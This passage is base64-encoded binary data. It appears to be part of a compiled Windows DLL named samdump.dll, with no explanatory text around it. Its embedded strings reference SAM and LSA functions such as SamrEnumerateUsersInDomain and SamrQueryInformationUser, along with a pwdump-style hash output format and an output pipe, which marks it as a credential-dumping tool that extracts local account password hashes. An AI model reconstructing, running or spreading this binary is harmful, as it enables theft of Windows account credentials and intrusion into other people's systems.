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 +BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI +AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM +T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu +YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv +ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y +IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u +IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh +YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx +OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp +dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl +YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v +dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj +ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA +AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy +cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAEdldExhc3RBY3Rp +dmVQb3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hBAHVzZXIzMi5kbGwAAAAAAAAAAAAA +AAAAAP////8DUAAQB1AAEP////+3UAAQu1AAEP////87UgAQP1IAEEg6bW06c3MAZGRkZCwgTU1N +TSBkZCwgeXl5eQBNL2QveXkAAFBNAABBTQAARGVjZW1iZXIAAAAATm92ZW1iZXIAAAAAT2N0b2Jl +cgBTZXB0ZW1iZXIAAABBdWd1c3QAAEp1bHkAAAAASnVuZQAAAABBcHJpbAAAAE1hcmNoAAAARmVi +cnVhcnkAAAAASmFudWFyeQBEZWMATm92AE9jdABTZXAAQXVnAEp1bABKdW4ATWF5AEFwcgBNYXIA +RmViAEphbgBTYXR1cmRheQAAAABGcmlkYXkAAFRodXJzZGF5AAAAAFdlZG5lc2RheQAAAFR1ZXNk +YXkATW9uZGF5AABTdW5kYXkAAFNhdABGcmkAVGh1AFdlZABUdWUATW9uAFN1bgBTdW5Nb25UdWVX +ZWRUaHVGcmlTYXQAAABKYW5GZWJNYXJBcHJNYXlKdW5KdWxBdWdTZXBPY3ROb3ZEZWMAAAAAfGYA +AAAAAAAAAAAAAGgAABBgAABsZgAAAAAAAAAAAABGaAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +NmgAABpoAAAOaAAAAAAAAKxnAABqZwAAkGcAANxnAADyZwAAoGcAAHpnAAC6ZwAAyGcAAMppAABU +aAAAYGgAAHJoAACAaAAAjmgAAKJoAAC2aAAAzGgAANpoAADmaAAA8GgAAABpAAAOaQAAIGkAADBp +AAA+aQAAUGkAAGhpAAB+aQAAmGkAALJpAABYZwAA5GkAAPJpAAAAagAADmoAABpqAAAsagAARGoA +AFxqAAB0agAAjGoAAKhqAAC0agAAwGoAAMpqAADWagAA5moAAPRqAAAEawAAGmsAACprAAA6awAA +TGsAAAAAAABTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAAGAJPdXRwdXREZWJ1Z1N0 +cmluZ0EAAC0BR2V0TGFzdEVycm9yAAAOA1dyaXRlRmlsZQDDAEZyZWVMaWJyYXJ5AB4AQ2xvc2VI +YW5kbGUAuQBGbHVzaEZpbGVCdWZmZXJzAAABA1dpZGVDaGFyVG9NdWx0aUJ5dGUANwBDcmVhdGVG +aWxlQQBLRVJORUwzMi5kbGwAAB8BTHNhQ2xvc2UAAEEBTHNhUXVlcnlJbmZvcm1hdGlvblBvbGlj +eQA7AUxzYU9wZW5Qb2xpY3kAQURWQVBJMzIuZGxsAABXAlJ0bFVud2luZADaAEdldENvbW1hbmRM +aW5lQQCOAUdldFZlcnNpb24AAIwARXhpdFByb2Nlc3MAywJUZXJtaW5hdGVQcm9jZXNzAAAJAUdl +dEN1cnJlbnRQcm9jZXNzAAwBR2V0Q3VycmVudFRocmVhZElkAADTAlRsc1NldFZhbHVlANACVGxz +QWxsb2MAANECVGxzRnJlZQCcAlNldExhc3RFcnJvcgAA0gJUbHNHZXRWYWx1ZQCYAlNldEhhbmRs +ZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0dXBJbmZvQQBa +AERlbGV0ZUNyaXRpY2FsU2VjdGlvbgA4AUdldE1vZHVsZUZpbGVOYW1lQQAAwQBGcmVlRW52aXJv +bm1lbnRTdHJpbmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXABkBR2V0RW52aXJvbm1lbnRT +dHJpbmdzABsBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAuAFIZWFwRGVzdHJveQC2AUhlYXBDcmVh +dGUAAPECVmlydHVhbEZyZWUAugFIZWFwRnJlZQAAlQJTZXRGaWxlUG9pbnRlcgAAbwBFbnRlckNy +aXRpY2FsU2VjdGlvbgAA3gFMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAyAFJbnRlcmxvY2tlZERlY3Jl +bWVudAAAywFJbnRlcmxvY2tlZEluY3JlbWVudAAAxQFJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9u +ALQBSGVhcEFsbG9jAM8AR2V0Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAADuAlZpcnR1YWxB +bGxvYwAAvQFIZWFwUmVBbGxvYwCoAlNldFN0ZEhhbmRsZQAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFy +ANwBTENNYXBTdHJpbmdBAADdAUxDTWFwU3RyaW5nVwAAaQFHZXRTdHJpbmdUeXBlQQAAbAFHZXRT +dHJpbmdUeXBlVwAAAAAAAAAAE/jgOAAAAACSawAAAQAAAAEAAAABAAAAiGsAAIxrAACQawAA8BIA +AJ5rAAAAAHNhbWR1bXAuZGxsAER1byABC4PQAQAAAAAAAAAACOMwAQAAAAAAAAAAAAAAAAAAAAAFNhbXJDbG9z +ZUhhbmRsZQBTYW1JRnJlZV9TQU1QUl9FTlVNRVJBVElPTl9CVUZGRVIAAABTYW1JRnJlZV9TQU1Q +Ul9VU0VSX0lORk9fQlVGRkVSAFNhbXJFbnVtZXJhdGVVc2Vyc0luRG9tYWluAABTYW1yUXVlcnlJ +bmZvcm1hdGlvblVzZXIAAAAAU2Ftck9wZW5Vc2VyAAAAAFNhbXJPcGVuRG9tYWluAABTYW1JQ29u +bmVjdABzYW1zcnYuZGxsAABXcml0ZUZpbGUgZmFpbGVkOiAlZApUZXh0OiAlcwAAACVzOiVkOiUw +MnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAy +eCUwMng6JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAy +eCUwMnglMDJ4JTAyeDo6OgoAU2FtclF1ZXJ5SW5mb3JtYXRpb25Vc2VyIGZhaWxlZCA6IDB4JTA4 +WAoAAABTYW1yT3BlblVzZXIoMHgleCkgZmFpbGVkIDogMHglMDhYCgBTYW1yRW51bWVyYXRlVXNl +cnNJbkRvbWFpbiBmYWlsZWQgOiAweCUwOFgKAFNhbU9wZW5Eb21haW4gZmFpbGVkIDogMHglMDhY +CgAAU2FtQ29ubmVjdCBmYWlsZWQgOiAweCUwOFgAAExzYVF1ZXJ5SW5mb3JtYXRpb25Qb2xpY3kg +ZmFpbGVkIDogMHglMDhYAAAATHNhT3BlblBvbGljeSBmYWlsZWQgOiAweCUwOFgAAABGYWlsZWQg +dG8gbG9hZCBmdW5jdGlvbnMKAAAARmFpbGVkIHRvIG9wZW4gb3V0cHV0IHBpcGUoJXMpOiAlZAoA +IAWTGQAAAAAAAAAAAAAAAKkkABBoYQAQWGEAEP////8AAAAA/////wAKAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAEAAAAAIAAADUYwAQCAAAAKhjABAJAAAAfGMAEAoAAABYYwAQEAAAACxj +ABARAAAA/GIAEBIAAADYYgAQEwAAAKxiABAYAAAAdGIAEBkAAABMYgAQGgAAABRiABAbAAAA3GEA +EBwAAAC0YQAQeAAAAKRhABB5AAAAlGEAEHoAAACEYQAQ/AAAAIBhABD/AAAAcGEAEGCFABAAAAAA +YIUAEAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAEAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAABtTgAQbU4AEG1OABBtTgAQbU4AEG1OABBidgAQYnYAEAAAIAAgACAAIAAgACAAIAAgACAA +KAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQ +ABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEA +gQCBAIEAgQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQ +ABAAEACCAIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA +EAAQABAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ +gQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECBABAAAAAAAAAAAAAAAABYgQAQAAAAAAAA +AAAAAAAAKIEAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAUAAMALAAAAAAAAAB0AAMAEAAAAAAAAAJYAAMAEAAAAAAAAAI0AAMAI +AAAAAAAAAI4AAMAIAAAAAAAAAI8AAMAIAAAAAAAAAJAAAMAIAAAAAAAAAJEAAMAIAAAAAAAAAJIA +AMAIAAAAAAAAAJMAAMAIAAAAAAAAAAMAAAAHAAAAeAAAAAoAAAAAAAAAAAAAAAECBAgAAAAApAMA +AGCCeYIhAAAAAAAAAKbfAAAAAAAAoaUAAAAAAACBn+D8AAAAAEB+gPwAAAAAqAMAAMGj2qMgAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAACB/gAAAAAAAED+AAAAAAAAtQMAAMGj2qMgAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAACB/gAAAAAAAEH+AAAAAAAAtgMAAM+i5KIaAOWi6KJbAAAAAAAAAAAAAAAAAAAA +AACB/gAAAAAAAEB+of4AAAAAUQUAAFHaXtogAF/aatoyAAAAAAAAAAAAAAAAAAAAAACB09je4PkA +ADF+gf4AAAAAAAAAAAAAAAD4AwAAAAAAAAAAAAAAAAAAAQAAABYAAAACAAAAAgAAAAMAAAACAAAA +BAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcAAAAL +AAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAAACEA +AAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAAVwAA +ABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACAAAAA +CgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEAAAAC +AAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAQwAAAEMA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAuAAAAAQAAAFh9ABAAAAAA7GUA +EOhlABDkZQAQ4GUAENxlABDYZQAQ1GUAEMxlABDEZQAQvGUAELBlABCkZQAQnGUAEJBlABCMZQAQ +iGUAEIRlABCAZQAQfGUAEHhlABB0ZQAQcGUAEGxlABBoZQAQZGUAEGBlABBYZQAQTGUAEERlABA8 +ZQAQfGUAEDRlABAsZQAQJGUAEBhlABAQZQAQBGUAEPhkABD0ZAAQ8GQAEOhkABDUZAAQzGQAEAAA +AAAuAAAAAAAAAAh+ABAoggAQKIIAECiCABAoggAQKIIAECiCABAoggAQKIIAECiCABB/f39/f39/ +fxB+ABAAAAAAAAAAAAAAAACAcAAAAQAAAPDx//9QU1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUERUAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFx+ABCcfgAQAAAAAP// +//8AAAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAD/////HgAAADsAAABaAAAAeAAA +AJcAAAC1AAAA1AAAAPMAAAARAQAAMAEAAE4BAABtAQAA/////x4AAAA6AAAAWQAAAHcAAACWAAAA +tAAAANMAAADyAAAAEAEAAC8BAABNAQAAbAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA8AAA +AAIwCDAOMBMwGTAgMCUwKjAzMDgwPjBGMEswUTBYMF0wYjBrMHAwdjB+MIMwiTCQMJUwmjCjMKgw +szC9MMcw0TDbMOUwLjE5MT8xXDGmMasxoTIyMz8zRjNjM3YzuDPVM/0zFTQfNEc0aTRzNJs0xDTc +NAQ1PzVYNXw1kzWdNcU10DVCNnc2hjaxNtQ25Tb2Ng83FjcbNyY3QjdIN043sDfxN1o4dDh9OMA5 